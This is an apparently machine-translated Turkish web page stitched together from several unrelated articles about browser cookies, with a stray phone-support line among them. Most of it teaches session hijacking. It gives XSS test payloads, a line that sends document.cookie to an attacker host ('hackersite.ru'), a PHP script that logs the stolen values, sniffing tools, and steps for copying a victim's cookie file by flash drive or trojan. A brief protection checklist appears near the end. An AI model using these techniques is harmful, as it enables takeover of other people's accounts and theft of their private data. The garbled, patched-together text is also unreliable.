Arkadaşım bir sitenin şifresini unuttu. Ancak daha önce oturum açarken "Beni hatırla" kutusunu işaretlemişti. Google tarayıcı Chrome, hesabının altındaki siteye giriş yapmasına izin verdi. Bu büyülü halin başka bir bilgisayara aktarılıp aktarılamayacağı soruldu. Parolayı değiştirmek veya geri yüklemek elbette daha doğru olurdu, ancak tanıdık bunu durumla ilgili olmayan nedenlerle yapamadı.

Aptallar için intercepter-ng nasıl kullanılır?

Modern yazılım seçeneklerinin çeşitliliğine rağmen, android için bilgisayar korsanlığı için intercepter ng'den daha iyi programlar bulmak zordur. Bu ürünün lehine olan ilk kriter, gerçek performansıdır. Ağdaki önerilen sniffer'ların çoğu, yalnızca bildirilen işlevleri yerine getirmeyen bir taklittir.

Bir sonraki olumlu faktör, uygulamanın çok yönlülüğü ve geniş bir kullanıcı kitlesinin kapsamıdır.

Bilgisayar yardımı 939-29-71

Sırayla başlayalım. Çerezler veya "çerezler" çok küçük metin dosyalarıdır - bilgi içeren yer imleri.

Web sunucusu bu bilgiyi kullanıcının tarayıcısına gönderir. bu bilgilerin gerekli olana kadar saklandığı yer. Pek net değil. Peki. TAMAM.

Daha da kolaylaştırmaya çalışacağım. Görmek. Herhangi bir siteye kayıt oldunuz.

Kayıt sırasında bu "çerezler" oluşturulur.

İşte buradalar.

Kurabiye Cadger

Program, WiFi ağındaki trafiği dinler, tanımlama bilgilerini yakalar ve kullanıcının oturumunu tarayıcınızda çoğaltır, istekleri kimlik bilgileriyle tekrarlar. Yazar Matthew Sullivan, 30 Eylül'de Derbycon hacker konferansında programın bir sunumunu yaptı. Konuşma sırasında Matthew Sullivan, WiFi üzerinden konferans katılımcılarından birinin Google ile güvenli olmayan bir oturumunu ele geçirdi.

Çerezler nasıl çalınır

Site sayfasındayken, adres çubuğu Firefox tarayıcısı veya Opera'ya aşağıdaki metni girin: javascript:document.write(document.cookie); şöyle bir şey göreceksiniz: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixduvar=0; remixBilgi=0; remixMembersBar=0; remix açıklaması=0; remixotomatik yer imi=8; remixemail=****; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Dikkat! .

Siteler Arası Komut Dosyası Çalıştırmak İçin Eksiksiz Kılavuz

XSS bir tür güvenlik açığıdır. yazılım, bir saldırganın diğer kullanıcılar tarafından görüntülenen web sayfalarına istemci tarafı komut dosyası eklemesine izin veren Web uygulamalarına özgüdür. güvenlik kısıtlamalarını aşma tarayıcısı)", bir saldırganın diğer kullanıcılar tarafından görüntülenen web sayfalarına istemci tarafı komut dosyası eklemesine olanak tanır.

Çerezler ve oturumlar arasındaki fark

Çok uzun zaman önce, kullanıcıların siteye nasıl kaydedileceği ve yetkilendirileceği hakkında bir makale yazdım.

". Bu yazıda, oturumlar ve çerezler arasındaki farkı yıkacağım. son seçiminizi yapmak için.

Kurabiye. Hayır, bu çerezlerle ilgili değil, senin güvenliğinle ilgili. Böylece, başka birinin bilgisayarında en sevdiğiniz site "vkontakte" ye (veya örneğin postaya bakın) gidin, "şifreyi kaydet" seçeneğini reddedin, mutlu bir şekilde postaya bakın ve çıkın. Ve şimdi adınız altında gidebileceğiniz gerçeğini düşünmeyin. sosyal ağ veya posta.

Siz bilmeden şifre hatırlayan bir programın durumunu düşünmüyorum bile. Bu zaten kasıtlı bir hack ve muhtemelen böyle bir şeyin olabileceğinden şüpheleneceksiniz ve böyle bir bilgisayarda favori sitenize gitmeyeceksiniz. Ancak basit insan merakından bahsedebiliriz - arkadaşları ziyaret ediyorduk ve sonra bir kez postanızı okuma fırsatı buldular. Böyle bir fırsatı reddedeceklerinden emin misiniz? Başına bir şey geleceğinden korkmuyor musun? Her halükarda, ahlak sorunlarını bir kenara bırakıp, bilgilerin bilgisayarda nasıl saklandığından, artık şifre sormadan bazı sitelere girebileceğinizden bahsedeceğim.

çerezler nasıl çalınır

Ve bu teknolojinin adı da çerezlerdir.

Ve işte her şey burada başladı. Aslında sitelere göz attığınız http protokolü (bu dahil) başlangıçta bir bağlantı sürdürme olasılığını ima etmiyordu. Yani kabaca konuşursak, siteye bir istek gönderirsiniz, bir yanıt alırsınız, ekranda görüntülenir ve ardından sunucu sizinle ilgili hiçbir şey hatırlamaz. Tabii ki, site tamamen bilgi amaçlı olduğunda ve sizin hakkınızda hiçbir şey hatırlamaması gerektiğinde bu iyidir, ancak Web 2.0 çağında yaşıyoruz 😉 Protokolün doğal gelişimi POST ve GET istekleridir, bir miktar veri gönderdiğinizde sunucu bunu yapabilir. bunları veritabanı verilerine yazın, ancak bu yeterli değil.

Çok basit bir örneğe bakalım. Forum. Böylece kayıt oldunuz ve forumda böyle ve böyle bir şifreye ve başka bazı ek verilere sahip bir kullanıcı olduğuna dair bir kayıt var. Ama şimdi foruma gidin ve giriş yapın - şifrenizi girin. Bir yerde giriş yaptığınıza dair bilgiler olmalı. sunucuda mı? Tabii ki değil! Yetkilendirmenin bilgisayarınızdan yapıldığına dair bilgileri sunucuya kaydetmek mümkün değildir - sizi bir başkasından ayırt edemez (IP adresiniz bile sizi benzersiz bir şekilde tanımlamaz)! Bu nedenle, yetkilendirmenin gerçekleştiği bilgisi bilgisayarınızda saklanmalıdır. Çerezler bunun içindir, bunun için yaratılmıştır.

Çerez, bilgisayarınızda ziyaret ettiğiniz site hakkında bilgi depolayan küçük bir kayıttır. Yetkilendirme üzerine, benzer bir giriş oluşturulur, bundan sonra zaten forumda dolaşabilirsiniz ve sizi tanıyacaktır. Ancak, bu zaten otomatik olarak gerçekleşecektir - çerezde saklanan bilgiler sayesinde - bu yüzden forumun ana yöneticisiymişsiniz gibi davranmak şifre doğrulamasını atlamadan yine de çalışmayacaktır.

Şimdi bu makalenin başladığı yere dönebiliriz. Parolanızı bile kaydetmeden bir yere giriş yaptıysanız, bilgisayarda artık bu kaynağa izinsiz olarak kendi adınıza girmenize izin veren bir giriş oluşturulmuş olabilir. Böyle bir girişin kendisi bir süre sonra geçersiz hale gelecektir, ancak onu silinmeye zorlayabilirsiniz. Her tarayıcı bunu farklı şekilde yapıyor, size en sevdiğim tarayıcıda nasıl yapılacağını göstereceğim. Google Chrome. Seçenekleri açma

"Gelişmiş" sekmesine gidin ve "çerezleri göster" düğmesini bulun

Şimdi tabi ki tüm çerezleri silebilirsiniz ama bu bilgisayar sahibini üzebilir. Bu nedenle örneğin üstteki alana ilgilendiğiniz sitenin adını girebilirsiniz.

Daha sonra sadece bu siteyle ilgili çerezler temizlenebilir. Benimkini deneyebilirsin. Ayrıca forumuma giriş yapıp çerezlerinizi temizlerseniz yetkilendirme bilgileriniz unutulacaktır. Dene!

tarafından desteklenen yorumlar

1. XSS nedir
XSS tipi bir güvenlik açığı, bir sayfanın gövdesine rastgele javascript kodu eklenmesine izin verir. XSS saldırısı diğerlerinden farklıdır (örn. SQL enjeksiyonu veya PHP enjeksiyonu), çünkü sunucuda değil, istemcide çalışır.

çerezler nasıl çalınır

Yardımıyla veritabanı tablolarını görüntüleyemez, bir kabuk yükleyemez vb. XSS'nin en yaygın kullanımı çerezleri çalmaktır.
Çerezler (Çerezler) - bir web sunucusu tarafından oluşturulan ve kullanıcının bilgisayarında dosya olarak saklanan küçük bir veri parçasıdır. Genellikle çerezler hesapları depolamak için kullanılır ve çoğu zaman şifreli bir şifre, giriş ve oturum kimliği içerirler.(Her zaman olmasa da)
XSS, aktif ve pasif olmak üzere iki tiptir.

Pasif XSS kurbanın doğrudan katılmasını istemek, örneğin javascript kodunu içeren bir bağlantıyı takip etmek. Bu tür XSS kullanırken, SI (Sosyal Mühendislik) olmadan yapamazsınız.

Aktif XSS kurbandan herhangi bir katılım gerektirmez, sadece XSS ile sayfaya gitmesi yeterlidir. Aktif XSS, örneğin forum gönderilerinde, sohbetlerde, haber eklemede vb. olabilir.

2.XSS'de Ara
Bu paragrafta size xss nasıl bulunur onu anlatacağım.

2.1 Pasif XSS
Pasif XSS'yi bulmak için giriş formunda yerine koymanız yeterlidir. komut dosyası çalıştıysa ve "xss" mesajı belirdiyse, güvenlik açığı mevcuttur, komut dosyası çalışmadıysa, yine de "> deneyebilirsiniz, bu muhtemelen en yaygın xss güvenlik açığıdır. Ne biri ne de diğeri işe yaradıysa, büyük olasılıkla güvenlik açığı yoktur.
Bir örneğe bakalım.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
"Arama" formunu görüyor musunuz? oraya koy "> ve "bul" u tıklayın
xss'li bir pencere uçtu yani xss var demektir.(Belki siz bu yazıyı okuduğunuzda bu xss zaten düzeltilmiş olacaktır)

2.2 Etkin XSS
Bu tür CSS, örneğin profil alanlarında, haber adına ve haberin kendisine (daha az sıklıkla) haber eklerken, html'nin etkin olduğu forumlarda / sohbetlerde / ziyaretçi defterlerinde mesajlarda olabilir. Burada her şey basit, bir önceki alt paragraftaki betiği alanlara giriyoruz ve ekranda mesaj görüntüleniyorsa zafiyet var demektir.
Forumlarda BB etiketlerinde xss'i düşünün.
javascript kodunu aptalca bir şekilde etikete şu şekilde eklemeyi deneyebilirsiniz:
javascript:uyarı('xss')
Bazı etiketlerin parametreleri vardır, örneğin, etiketin dynsrc ve lowsrc parametreleri vardır, kodu şöyle değiştirmeye çalışalım:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Komut dosyası işe yaradıysa, xss

3.Çerezleri çalmak için XSS kullanma
Şimdi en lezzetli
Çerezleri çalmak için bir web sniffer'a ihtiyacımız var, hostinginize bir çeşit sniffer yükleyebilir veya artık dolu olan bir online sniffer kullanabilirsiniz.
Pasif XSS aracılığıyla çerezleri çalmak için kurbanın zehirli bir bağlantıyı izlemesi gerekir. Çerezleri çalmak için bunun yerine kullanacağız başka bir komut dosyası:
betiği linkte değiştiriyoruz ve kurbanın takip etmesine izin veriyoruz, sniffer günlüğünü görüp seviniyoruz.
Bir örneğe bakalım.
Bu XSS'yi bir önceki paragraftan rambler üzerinde alalım.
Yapıştırmak
">
arama formunda "bul" u tıklayın, adres çubuğuna bakın ve bakın:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Bu linki kurbana atıyoruz ve çerezlerin tadını çıkarıyoruz.
Böyle bir bağlantı gören kurban bir şeyden şüphelenebilir, bu nedenle kodlamanız önerilir.
">
URL'de Veya http://tinyurl.com/ gibi hizmetleri kullanın
Aktif XSS'ye geçelim, burada her şey basit, alert() yerine img = new Image(); img.src = "sniffer image address"+document.cookie;

Artık kurabiyelerimiz var. Ama onlarla ne yapmalı? Çok basit, kendilerinin yerine değiştirilmeleri gerekir. AT Opera tarayıcısı yerleşik bir çerez düzenleyici var (araçlar-> gelişmiş-> çerez yönetimi), firefox için bir eklenti var (adını hatırlamıyorum, google kullanın)
Şimdilik bu kadar, belki makale eklenecektir.

ÇEREZ kurabiyeleri nasıl alınır sorusuna. Çerezlere nasıl ulaşılacağını lütfen bana söyleyin !!! yazar tarafından 1 set Vlad eeeeeeeeeeeeee en iyi cevap Çerezler nedir?
Gerçek şu ki, www teknolojilerinin geliştirilmesi ve internette programlama dillerinin tanıtılması sürecinde, program geliştiricilerinden önce çok ciddi bir sorun ortaya çıktı - her bir kullanıcı için algoritma yürütme sonuçlarının nasıl kaydedileceği uzun zamandır? HTTP protokolü kendi başına yazılım işlemlerinin sonuçlarını yakalama yeteneğine sahip değildir. Oturumları kullanmak da soruna bir çözüm değil, çünkü sunucuyla bağlantı koptuktan hemen sonra eylemleri sonlandırılıyor.
Sorun, tanımlama bilgileri mekanizmasının (yani İngilizce'den çevrilmiş "çerezler") tanıtılmasıyla çözüldü. Çerezlerin dikkate değer bir özelliği vardır - kullanıcının sabit diskinde saklanırlar ve orada neredeyse sınırsız bir süre saklanabilirler.
Çerezler özünde, tarayıcı tarafından kullanılan özel bir dizinde (genellikle Geçici İnternet Dosyaları olarak adlandırılır) depolanan düz metin dosyalarıdır ve bunları bu dizine giderek görebilirsiniz ( hızlı erişim IE tarayıcısı için Araçlar -> İnternet Seçenekleri -> Geçici İnternet Dosyaları -> Ayarlar -> Görünüm menü öğeleri aracılığıyla gerçekleştirilir
Bazı çerezler yalnızca bir oturum için saklanabilir, tarayıcı kapatıldıktan sonra silinirler. Belirli bir süre için belirlenen diğerleri bir dosyaya yazılır. Genel olarak, bu dosyaya "cookies.txt" denir (ancak birkaç tane olabilir) ve bilgisayarda yüklü olan tarayıcının çalışma dizininde bulunur.
Diğer bir deyişle
Çerez, sunucunun tarayıcıya gönderdiği küçük bir metin bilgisidir. Çerezler kendi başlarına hiçbir şey yapamazlar, ancak bir kullanıcı sunucuya eriştiğinde (adresini tarayıcı satırına yazar), sunucu çerezlerde yer alan bilgileri okuyabilir ve analizine dayanarak herhangi bir işlemi gerçekleştirebilir. Örneğin, web üzerinden bir şeye yetkili erişim durumunda, oturum sırasında kullanıcı adı ve şifre çerezlerde saklanır, bu da kullanıcının şifre korumalı her belgeyi talep ederken bunları tekrar girmemesine izin verir.
Bu konu üzerinden başkasının şifre korumalı hesaplarına erişmeye çalışıyorsanız, kurbanın çalıştığı bilgisayara erişiminiz varsa, uzaktan (trojan) veya arsızca bir flash sürücüye kopyalayarak bir yol bulmanız gerekir. bu cookie.txt dosyasını kopyalayın ve (aynı) tarayıcınızda değiştirin. Ardından ilgilendiğiniz hesabın bulunduğu istediğiniz siteye gidersiniz ve otomatik olarak erişim sağlarsınız. Ama unutmayın, eğer mağdur çalışma sonunda hesaptan çıkışa (örneğin mailden) basarsa, o zaman çerezlerdeki oturum bilgileri silinir ve herhangi bir erişim elde edemezsiniz.
Mozilla Firefox, çerezleri kullanıcı profilinde, C:Documents and SettingsUsernameApplication DataMozillaFirefoxProfiles dosyasında saklar.<имя профиля>cookie.txt
internet gezgini bu çerezleri ayrı metin dosyaları olarak C:Documents and SettingsUsernameCookies klasörüne kaydeder.
Opera, tanımlama bilgilerini C:Documents and SettingsUsernameApplication DataOperaOperaprofilecookies4.dat dosyasında saklar.

Kurabiye - web sitesi tarafından kullanıcının bilgisayarında saklanan bir metin dosyası biçimindeki bilgiler. Kimlik doğrulama verilerini içerir (oturum açma/şifre, kimlik, telefon numarası, adres posta kutusu), kullanıcı ayarları, erişim durumu. Tarayıcı profilinde saklanır.

çerez hilesi bir ziyaretçinin bir web kaynağına yaptığı oturumun çalınması (veya "kaçırılması"). Gizli bilgiler yalnızca gönderen ve alıcı için değil, aynı zamanda üçüncü bir tarafa da - araya giren kişi için erişilebilir hale gelir.

Çerez Hackleme Araçları ve Teknikleri

Bilgisayar hırsızları, gerçek hayatta meslektaşları gibi, beceri, el becerisi ve bilgiye ek olarak, elbette kendi araçlarına da sahiptir - bir tür ana anahtar ve sonda cephaneliği. İnternet sakinlerinden çerezleri avlamak için kullandıkları en popüler bilgisayar korsanları numaralarını tanıyalım.

koklayıcılar

Özel programlar ağ trafiğini izlemek ve analiz etmek için. İsimleri İngilizce "sniff" (sniff) fiilinden gelir, çünkü. düğümler arasında iletilen paketleri kelimenin tam anlamıyla "koklayarak".

Ancak saldırganlar, oturum verilerini, mesajları ve diğer kesin bilgi. Saldırılarının amacı çoğunlukla, çerezlerin açık bir HTTP oturumunda gönderildiği, yani pratik olarak şifrelenmedikleri güvenli olmayan ağlardır. (Genel Wi-Fi en savunmasız olanıdır.)

Kullanıcının ana bilgisayarı ile web sunucusu arasındaki İnternet kanalına bir sniffer enjekte etmek için aşağıdaki yöntemler kullanılır:

  • ağ arayüzlerini (hub'lar, anahtarlar) "dinleme";
  • trafiğin dallanması ve kopyalanması;
  • ağ kanalının kesilmesine bağlantı;
  • kurban trafiğini bir dinleyiciye yönlendiren özel saldırılar aracılığıyla analiz (MAC sahtekarlığı, IP sahtekarlığı).

XSS kısaltması, Siteler Arası Komut Dosyası anlamına gelir. Kullanıcı verilerini çalmak için web sitelerine saldırmak için kullanılır.

XSS'nin çalışma şekli aşağıdaki gibidir:

  • bir saldırganın bir web sitesinin, forumun web sayfasına veya bir mesaja (örneğin, bir sosyal ağda sohbet ederken) kötü amaçlı kod (özel bir gizlenmiş komut dosyası) enjekte etmesi;
  • kurban virüslü sayfayı ziyaret eder ve etkinleştirir kodu ayarla PC'nizde (tıklar, bir bağlantıyı takip eder, vb.);
  • sırayla, etkinleştirilen kötü amaçlı kod, kullanıcının gizli verilerini tarayıcıdan (özellikle çerezler) "çıkarır" ve bunları saldırganın web sunucusuna gönderir.

Bilgisayar korsanları, bir yazılım XSS mekanizmasını "yerleştirmek" için web sunucularında, çevrimiçi hizmetlerde ve tarayıcılarda her türlü güvenlik açığını kullanır.

Tüm XSS güvenlik açıkları iki türe ayrılır:

  • Pasif. Saldırı, belirli bir web sayfası komut dosyasının sorgulanmasıyla elde edilir. Zararlı kod bir web sayfasında çeşitli biçimlerde girilebilir (örneğin, bir sitedeki arama çubuğuna). Pasif XSS'ye en duyarlı olanlar, veri geldiğinde HTML etiketlerini filtrelemeyen kaynaklardır;
  • Aktif. Doğrudan sunucuda bulunur. Ve kurbanın tarayıcısında etkinleştirilirler. Çeşitli bloglarda, sohbetlerde ve haber akışlarında dolandırıcılar tarafından aktif olarak kullanılırlar.

Bilgisayar korsanları, kurbanın hiçbir şeyden şüphelenmemesi için XSS komut dosyalarını dikkatli bir şekilde "kamufle eder". Dosya uzantısını değiştirirler, kodu bir resim olarak aktarırlar, onları bağlantıyı takip etmeye motive ederler, ilgi çekici içeriklerle cezbederler. Sonuç olarak: kendi merakıyla başa çıkmayan bir PC kullanıcısı, kendi eliyle (bir fare tıklamasıyla) oturum çerezleri (bir oturum açma ve şifre ile!) XSS komut dosyasının yazarına - bir bilgisayar kötü adamı.

çerez sahtekarlığı

Tüm tanımlama bilgileri, herhangi bir değişiklik yapılmadan (orijinal formlarında) aynı değerler, diziler ve diğer verilerle saklanır ve web sunucusuna ("geldikleri") gönderilir. Parametrelerinin kasıtlı olarak değiştirilmesine çerez sahtekarlığı denir. Başka bir deyişle, bir çerez sahte olduğunda, saldırgan hüsnükuruntu yapar. Örneğin, bir çevrimiçi mağazada ödeme yaparken, çerezdeki ödeme miktarı daha küçük bir tarafa değiştirilir - böylece satın almalarda “tasarruf” olur.

Bir sosyal ağda başka birinin hesabından çalınan oturum çerezleri, başka bir oturuma ve başka bir PC'ye “eklenir”. Çalınan çerezlerin sahibi, tam erişim sayfasında olduğu sürece mağdurun hesabına (yazışma, içerik, sayfa ayarları) gönderilir.

"Düzenleme" çerezleri aşağıdakiler kullanılarak gerçekleştirilir:

  • Opera tarayıcısında "Çerezleri yönet ..." işlevleri;
  • eklentiler Çerez Yöneticisi ve FireFox için Gelişmiş Çerez Yöneticisi;
  • IECookiesView yardımcı programları (yalnızca Internet Explorer için);
  • Metin düzeltici AkelPad, NotePad veya Windows not defteri gibi.

Verilere fiziksel erişim

Büyük ölçüde basit devre uygulama birkaç adımdan oluşur. Ancak, yalnızca kurbanın bilgisayarı açık oturum, örneğin Vkontakte, gözetimsiz bırakılır (ve oldukça uzun bir süre!):

  1. Tarayıcının adres çubuğuna girin javascript işlevi, kaydedilen tüm çerezleri görüntüler.
  2. "ENTER" tuşuna bastıktan sonra hepsi sayfada görünür.
  3. Çerezler kopyalanır, bir dosyaya kaydedilir ve ardından bir flash sürücüye aktarılır.
  4. Başka bir bilgisayarda, çerezler yeni bir oturumda değiştiriliyor.
  5. Kurbanın hesabına erişim açılır.

Kural olarak, bilgisayar korsanları yukarıdaki araçları (+ diğerleri) hem kombinasyon halinde (birçok web kaynağındaki koruma seviyesi oldukça yüksek olduğundan) hem de ayrı olarak (kullanıcılar aşırı saf olduğunda) kullanır.

XSS + koklayıcı

  1. Çevrimiçi dinleyicinin (kendi üretiminin veya belirli bir hizmetin) adresini belirten bir XSS betiği oluşturulur.
  2. Kötü amaçlı kod, .img uzantısıyla (resim formatı) kaydedilir.
  3. Daha sonra bu dosya saldırının gerçekleştirileceği site sayfasına, sohbete veya kişisel mesaja yüklenir.
  4. Kullanıcının dikkati oluşturulan "tuzak"a çekilir (burada sosyal mühendislik devreye girer).
  5. "Tuzak" işe yararsa, kurbanın tarayıcısından gelen çerezler, koklayıcı tarafından yakalanır.
  6. Kraker, sniffer günlüklerini açar ve çalınan çerezleri çıkarır.
  7. Ardından yukarıdaki araçları kullanarak hesap sahibinin haklarını elde etmek için bir ikame gerçekleştirir.

Çerezleri bilgisayar korsanlığından koruma

  1. Şifreli bir bağlantı kullanın (uygun protokolleri ve güvenlik yöntemlerini kullanarak).
  2. "Yeni özgür yazılım" ile tanışmak için şüpheli bağlantılara, resimlere, cazip tekliflere yanıt vermeyin. Özellikle yabancılardan.
  3. Yalnızca güvenilir web kaynaklarını kullanın.
  4. "Çıkış" düğmesine basarak yetkili bir oturumu sonlandırın (ve sadece sekmeyi kapatmayın!). Özellikle hesap ile giriş yapılmadıysa kişisel bilgisayar, ancak örneğin, bir İnternet kafedeki bir bilgisayardan.
  5. Tarayıcınızın "Şifreyi Kaydet" özelliğini kullanmayın. Saklanan kayıt verileri zaman zaman hırsızlık riskini artırır. Tembel olmayın, her oturumun başında şifre girmek ve giriş yapmak için birkaç dakikanızı ayırmayın.
  6. Web'de gezindikten sonra - sosyal ağları, forumları, sohbetleri, siteleri ziyaret ederek - kaydedilen çerezleri silin ve tarayıcı önbelleğini temizleyin.
  7. Tarayıcıları ve antivirüs yazılımını düzenli olarak güncelleyin.
  8. XSS saldırılarına karşı koruma sağlayan tarayıcı uzantılarını kullanın (örneğin, FF için NoScript ve Google Chrome).
  9. Hesaplarda periyodik olarak.

Ve en önemlisi - internette dinlenirken veya çalışırken dikkatinizi ve dikkatinizi kaybetmeyin!

Çerez nedir?

Http sunucusunun kullanıcının bilgisayarında bazılarını depolamasına izin veren bir mekanizma vardır. metin bilgisi ve sonra onunla iletişime geçin. Bu bilgiçerez denir. Aslında, her çerez bir çifttir: parametrenin adı ve değeri. Her çereze ait olduğu etki alanı da atanır. Güvenlik amacıyla, tüm tarayıcılarda http sunucusunun yalnızca kendi etki alanı tanımlama bilgisine erişmesine izin verilir. Ek olarak, çerezlerin bir son kullanma tarihi olabilir, bu durumda tüm tarayıcı pencereleri kapatılsa bile bu tarihe kadar bilgisayarda saklanırlar.


Çerezler neden önemlidir?

Tüm çok kullanıcılı sistemlerde, kullanıcıyı tanımlamak için çerezler kullanılır. Daha doğrusu, kullanıcının hizmetle mevcut bağlantısı, kullanıcı oturumu. Birisi çerezlerinizi tanırsa, sizin adınıza oturum açabilir. Çünkü şu ançok az İnternet kaynağı, bir kullanıcı oturumu sırasında IP adresinin değişimini kontrol eder.


Çerezler nasıl değiştirilir veya değiştirilir?

Tarayıcı geliştiricileri, çerezleri düzenlemek için yerleşik araçlar sağlamaz. Ama normal bir not defteri (not defteri) ile idare edebilirsiniz.


1. Adım: oluştur Metin dosyası metin ile

pencereler Kayıt düzenleyici Sürüm 5.00



@="C:\\IE_ext.htm"

IE_ext.reg adı altında kaydediyoruz.

Adım 2: Oluşturulan dosyayı kullanarak Windows kayıt defterine değişiklikler ekleyin.

Adım 3: metin içeren bir metin dosyası oluşturun

< script dil="javascript">
external.menuArguments.clipboardData.setData("Metin" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testadı=testdeğeri; yol=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);


C:\IE_ext.htm olarak kaydedin

Adım 4: Bizi ilgilendiren web sitesine gidiyoruz.

Adım 5: Sağ tık fare tıklaması boş alan sayfasına gidin ve menü öğesini seçin "Çerezlerle Çalışmak". Panoya erişime izin ver. Bu site için çerezleriniz panoya yerleştirilecektir. Not defterini (not defteri) yapıştırabilir ve görebilirsiniz.


Adım 6: Bazı tanımlama bilgilerini değiştirmek için, C:\IE_ext.htm dosyasını düzenleyin. deneme adıçerez adına, test değeri- anlamı üzerine, testdomain.com- web sitesi etki alanına. Gerekirse bunun gibi daha fazla satır ekleyin. Kontrol kolaylığı için, değişiklikten önce ve sonra mevcut çerezlerin çıktısını komut dosyasına ekledim: alert(external.menuArguments.document.cookie);

Adım 7: Adım 5'i tekrar çalıştırın ve ardından sayfayı yenileyin.

Alt satır: Güncellenmiş çerezlerle bu İnternet kaynağına gideceğiz.

JavaScript ile çerezler nasıl çalınır?

Saldırgan, kurbanın bilgisayarında rastgele bir JavaScript komut dosyası yürütme fırsatı bulmayı başardıysa, oku mevcut çerezlerçok kolay yapabilir. Örnek:


varstr=document.cookie;

Ancak bunları kendi sitesine aktarabilecek mi, çünkü daha önce de belirttiğim gibi bir JavaScript betiği bunu yapamaz. ek onay başka bir etki alanında bulunan bir siteye erişmek? Bir JavaScript betiğinin herhangi bir http sunucusunda bulunan herhangi bir resmi yükleyebileceği ortaya çıktı. Aynı zamanda, indirme isteğindeki herhangi bir metinsel bilgiyi bu resme aktarın. Örnek: http://hackersite.ru/xss.jpg?text_info Yani bu kodu çalıştırırsanız:

değişken= yeni görüntü();

resim.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(belge.cookie);


daha sonra çerezler "resmi" indirme ve saldırgana "bırakma" isteğinde olacaktır.

Bir "resim" yüklemek için bu tür istekler nasıl ele alınır?

Bir saldırganın yalnızca barındırma bulması gerekir php desteği ve kodu şöyle yerleştirin:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Daha sonra bu komut dosyasına yönelik tüm sorgu parametreleri dosyaya kaydedilecektir. log.txt. Değiştirmek için yalnızca daha önce açıklanan JavaScript komut dosyasında kalır. http://hackersite.ru/xss.jpg bu php betiğinin yoluna.


Sonuç

XSS güvenlik açıklarından yararlanmanın yalnızca en basit yolunu gösterdim. Ancak, çok kullanıcılı bir İnternet sitesinde bu türden en az bir güvenlik açığının bulunmasının, bir saldırganın kaynaklarını sizin adınıza kullanmasına izin verebileceğini kanıtlıyor.

Opera ana menüyü açın, "Ayarlar" bölümüne gidin ve satırı seçin " Genel Ayarlar...". Ve sadece sıcak basabilirsin CTRL tuşları+ F12. Bu, "Gelişmiş" sekmesinde sol bölmedeki "Çerezler" bölümüne tıklamanız gereken tarayıcı ayarları penceresini açacaktır. İçinde "Çerezleri Yönet" düğmesini tıklamanız gerekir.

AT Mozilla Firefox menüdeki "Araçlar" bölümünü açın ve "Ayarlar" öğesini seçin. Ayarlar penceresinde, "Gizlilik" sekmesine gitmeniz, orada "Çerezleri Göster ..." yazan düğmeyi bulmanız ve tarayıcı tarafından saklanan çerezlerin listesine erişmek için tıklamanız gerekir. Burada aranabilir ve görüntülenebilirler.

Internet Explorer'da menüdeki "Araçlar" bölümünü genişletin ve "Özellikler"i seçin. Özellik ayarları penceresinde Genel sekmesine gidin ve Gözatma Geçmişi bölümündeki Seçenekler düğmesini tıklayın. Bu şekilde, “Dosyaları Göster” düğmesine tıklamanız gereken başka bir pencere (“Geçici Dosya Seçenekleri”) açacaksınız.

Açılan Internet Explorer geçici dosyalar klasörünün içerik listesindeki "Ad" başlığına tıklayın - bu şekilde tüm tanımlama bilgilerini ortak bir heterojen dosya yığınında tek bir blokta gruplayabilirsiniz. Burada ilgilendiğiniz dosyayı bulabilir ve görüntülemek veya düzenlemek için standart bir Not Defteri'nde açabilirsiniz.

Google Chrome'da, pencerenin sağ üst köşesindeki İngiliz anahtarı simgesine tıklayın ve menüden Seçenekler'i seçin. Tarayıcı "Ayarlar" sayfasını açacaktır ve sol bölmesinde "Gelişmiş" bağlantısına tıklarsınız ve gelişmiş ayarlar sayfasında "İçerik Ayarları" düğmesine tıklarsınız. henüz değil son sayfa bu tarayıcı tarafından saklanan çerezlere giden yolda.

Bir sonraki sayfada "Tüm çerezler ve site verileri" düğmesini tıklayın ve sonunda çerez listesine erişebileceksiniz.

Google Chrome, çerezleri arama, görüntüleme ve silme olanağı sağlar.

Safari tarayıcısında, sağdaki dişli simgesine tıklayın üst köşe ve "Ayarlar ..." satırını seçin. Ayarları değiştirme penceresinde, oradaki "Çerezleri Göster" düğmesine tıklamak için "Güvenlik" sekmesine gitmeniz gerekir. Safari yalnızca tanımlama bilgilerini aramak ve silmek için işlevler sağlar, bu geçici dosyaların içeriği burada yalnızca kısmen görülebilir.